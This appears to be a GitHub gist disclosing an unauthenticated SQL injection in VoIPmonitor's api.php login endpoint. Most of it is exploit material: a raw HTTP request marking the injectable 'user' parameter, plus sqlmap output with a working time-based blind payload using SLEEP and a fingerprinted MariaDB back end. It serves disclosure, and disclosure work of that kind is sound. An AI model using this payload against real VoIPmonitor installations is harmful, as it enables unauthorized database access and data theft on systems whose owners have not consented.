Skip to content

Instantly share code, notes, and snippets.

@divinepwner
Created April 28, 2021 19:33
Embed
What would you like to do?
voipmonitor unauth sql injection

sql injection on user parameter. since, api.php file doesnt need any authentication attacker can exploit this vulnerability without any valid session or credentials.

GET /voipmonitorpath/api.php?action=login&user=[inject_here]&pass=trollz HTTP/1.1
Host: vulnerableinstance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: close

sqlmap result:

Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://vulnerableinstance:80/voipmonitorpath/api.php?action=login&user=' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))Evax) AND 'jvDj'='jvDj&pass=trollz
---
[02:19:33] [INFO] testing MySQL
[02:20:22] [INFO] confirming MySQL
web application technology: Nginx 1.14.2, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.3.29-MariaDB-1:10.3.29+maria~stretch'

cc: @cnbrkbolat & @R0h1rr1m

@divinepwner
Copy link
Author

website of the product:

https://www.voipmonitor.org/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment